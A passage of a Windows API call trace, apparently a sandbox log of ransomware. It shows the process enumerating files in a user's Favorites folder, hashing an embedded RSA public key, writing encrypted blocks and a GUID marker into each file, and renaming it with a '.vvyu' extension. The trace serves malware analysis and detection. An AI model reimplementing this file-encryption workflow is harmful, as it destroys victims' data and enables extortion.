hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fc0 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0198.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0198.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0198.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0198.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94f90 | out: hHeap=0x620000) returned 1 [0198.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.381] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.382] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.382] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.384] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.384] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.385] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.385] CloseHandle (hObject=0x568) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0198.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0198.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0198.387] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url.vvyu")) returned 1 [0198.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.390] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.393] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0198.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.393] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0198.394] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.396] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.396] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.399] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.399] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.400] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.400] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.401] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.401] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.401] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.401] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.402] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.402] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.402] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.403] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.403] GetLastError () returned 0x0 [0198.403] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.403] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.403] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.403] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.403] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.403] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f90 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f48 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.404] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0198.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ff0 [0198.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2fd8 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0198.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.407] GetCurrentThreadId () returned 0x66c [0198.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5b60 [0198.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.408] GetCurrentThreadId () returned 0x66c [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ff0 [0198.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0198.411] HeapFree (in: 